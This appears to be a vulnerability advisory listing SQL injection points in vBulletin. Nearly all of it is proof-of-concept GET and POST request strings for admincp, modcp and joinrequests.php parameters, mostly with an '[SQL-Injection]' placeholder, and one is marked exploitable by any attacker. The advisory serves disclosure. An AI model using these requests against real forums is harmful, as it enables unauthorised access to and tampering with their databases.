VBulletin Multiple Moderator And Administrator SQL Injection Vulnerabilities
No exploit is required. The following GET and POST proofs of concept are available:

The following issue is exploitable by any attacker:

> /joinrequests.php:
POST: <do=processjoinrequests&usergroupid=22&request[[SQL-Injection]]=0>

These issues affect the following administrator scripts:

> /admincp/admincalendar.php:
GET: <do=addcustom&calendarcustomfieldid=[SQL-Injection]>
GET: <do=addmod&calendarid=[SQL-Injection]>
GET: <do=addmod&calendarid=1&moderatorid=[SQL-Injection]>
GET: <do=deletecustom&calendarcustomfieldid=[SQL-Injection]>
POST: <do=doremoveholiday&holidayid=[SQL-Injection]>
GET: <do=edit&calendarid=[SQL-Injection]>
POST: <do=kill&calendarid=[SQL-Injection]>
POST: <do=killmod&$calendarmoderatorid=[SQL-Injection]>
GET: <do=remove&calendarid=[SQL-Injection]>
POST: <do=removemod&moderatorid=[SQL-Injection]>
POST: <do=saveholiday&holidayinfo[title]=sepro&holidayid=0XF>
POST: <do=update&calendar[daterange]=2002-2008&calendarid=0XF>
GET: <do=updateholiday&holidayid=0XF>
POST: <do=update&calendarid=1&calendar[daterange]=1970-2030&calendar[0]=[SQL-Injection]>
POST: <do=updatemod&calendarid=1&moderatorid=[SQL-Injection]>
POST: <do=updatemod&moderatorid=1&moderator[calendarid]=[SQL-Injection]>

> /admincp/cronlog.php:
POST: <do=doprunelog&cronid=0XF>
POST: <do=prunelog&cronid=0XF>

> /admincp/email.php:
POST: <do=makelist&user[usergroupid][0]=[SQL-Injection]>

> /admincp/help.php:
POST: <do=doedit&help[script]=1&help[0]=[SQL-Injection]>

> /admincp/user.php:
GET: <do=find&orderby=username&limitnumber=[SQL-Injection]>
GET: <do=find&orderby=username&limitstart=[SQL-Injection]>

> /admincp/usertitle.php:
GET: <do=edit&usertitleid=0XF>
GET: <do=pmuserstats&ids=0XF>

> /admincp/language.php:
POST: <do=update&rvt[0]=[SQL-Injection]>

> /admincp/phrase.php:
POST: <do=completeorphans&keep[0]=[SQL-Injection]>

> /admincp/template.php:
GET: <do=editstyle&dostyleid=[SQL-Injection]>
GET: <do=editstyle&dostyleid=[SQL-Injection]>
POST: <do=revertall&dostyleid=[SQL-Injection]>

> /admincp/thread.php:
POST: <do=dothreads&thread[forumid]=0XF>

> /admincp/usertools.php:
POST: <do=updateprofilepic>

> /admincp/vbugs_admin.php:
GET: <do=editseverity&vbug_severityid=[SQL-Injection]>
GET: <do=removeseverity&vbug_severityid=[SQL-Injection]>
GET: <do=updateseverity&vbug_severityid=[SQL-Injection]>

These issues affect the following moderator scripts:

> /modcp/announcement.php:
POST: <do=update&announcementid=1&start=24-07-05&end=30-07-05&announcement[0]=[SQL-Injection]>

> /modcp/thread.php:
POST: <do=dothreads&thread[forumid]=0XF>
POST: <do=dothreadssel&criteria=a:1:{s:7:"forumid";s:5:"aaaa'";}>

> /modcp/user.php:
GET: <do=avatar&userid=0XF>